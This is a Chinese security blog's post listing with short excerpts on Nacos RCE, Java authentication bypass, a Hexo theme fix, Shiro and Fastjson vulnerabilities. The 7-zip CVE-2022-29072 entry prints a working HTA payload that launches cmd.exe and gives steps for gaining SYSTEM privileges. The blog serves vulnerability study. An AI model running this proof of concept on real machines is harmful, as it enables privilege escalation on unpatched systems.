Nacos 文件上传功能条件竞争RCE

发表于 2025-05-15 更新于 2025-07-29
本文字数： 9 阅读时长 ≈ 1 分钟

https://uzzju.com/post/87.java
https://rivers.chaitin.cn/blog/cqcu0eh0lnee0vjd59i0

Java线程复用导致的认证绕过

发表于 2025-04-30 更新于 2025-07-29
本文字数： 31 阅读时长 ≈ 1 分钟

线程池复用TreadLocal

静态变量未同步

缓存处理不当

tomcat rce

异步操作处理不当

nacos rce

解决hexo-next主题上游仓库改变告警

发表于 2025-04-14 更新于 2025-07-29 分类于 bug修复， tips
本文字数： 167 阅读时长 ≈ 1 分钟

找到安装的hexo-next-title hexo-next-share hexo-next-exif hexo-next-utteranc等插件的安装目录在其目录下找到node_modules目录
观察是否存在 next-util 目录，若存在打开该目录中的index.js进行修改
注释调添加的before_generate过滤器

'use strict';

const yaml = require('js-yaml');
const fs = require('fs');
const path = require('path');
const { merge } = require('lodash');

module.exports = function(hexo, pluginDir) {
  hexo.extend.filter.register('before_generate', function err() {
    //hexo.log.warn(`The upstream repository of theme NexT has been changed.`);
    //hexo.log.warn(`For more information: https://github.com/next-theme/hexo-theme-next`);
    //hexo.log.warn(`Documentation: https://theme-next.js.org`);
  });
  this.hexo = hexo;
  this.pluginDir = pluginDir;
  this.getFilePath = function(file) {
    return this.pluginDir ? path.resolve(this.pluginDir, file) : file;
  };
  this.getFileContent = function(file) {
    return fs.readFileSync(this.getFilePath(file), 'utf8');
  };
  this.defaultConfigFile = function(key, file) {
    const defaultConfig = file ? yaml.safeLoad(this.getFileContent(file)) : {};
    this.hexo.config[key] = merge(defaultConfig[key], this.hexo.theme.config[key], this.hexo.config[key]);
    return this.hexo.config[key];
  };
};

7-zip权限提升漏洞【CVE-2022-29072】

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 126 阅读时长 ≈ 1 分钟

这玩意儿很简单，原理不清楚，不过7-zip官方并不承认这个漏洞，他们说这个洞是微软的锅，不过我看也确实是。

<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

找个文本文件把上面的内容写进去，然后讲后缀名改为7z。然后讲这个文件拖动到7zip的helper窗口中就会弹出DOS窗口，查看当前权限可以看到为system权限

Apache Shiro RegExPatternMatcher 认证绕过【CVE-2022-32532】

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 172 阅读时长 ≈ 1 分钟

本文简要介绍了 CVE-2022-32532 的漏洞成因

阅读全文 »

Fastjson反序列化漏洞原理分析及复现

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 2.5k 阅读时长 ≈ 9 分钟

本文介绍了 Fastjson反序列化漏洞原理分析及复现

阅读全文 »

Fastjson反序列化漏洞TemplateImpl利用链条跟踪与分析

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 3.7k 阅读时长 ≈ 13 分钟

@TOC

我们知道Fastjson在进行序列化的时候会调用当前类的所有getter方法去获取所有public成员变量的值，像这样：

package com.armandhe.javabase;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.serializer.SerializerFeature;

public class FastjsonTest {
    public static void main(String[] args) {
        FastjsonUnserilizeTest fastjsonUnserilizeTest = new FastjsonUnserilizeTest();
//        fastjsonUnserilizeTest.setAge(20);
//        fastjsonUnserilizeTest.setName("armandhenewpy");
        String s = JSON.toJSONString(fastjsonUnserilizeTest, SerializerFeature.WriteClassName);
        System.out.println(s);
//        String s1 = "{\"@type\":\"com.armandhe.javabase.FastjsonUnserilizeTest\",\"age\":20,\"name\":\"armandhenewpy\"}";
//        JSONObject jsonObject = JSON.parseObject(s1);
//        System.out.println(jsonObject);
    }
}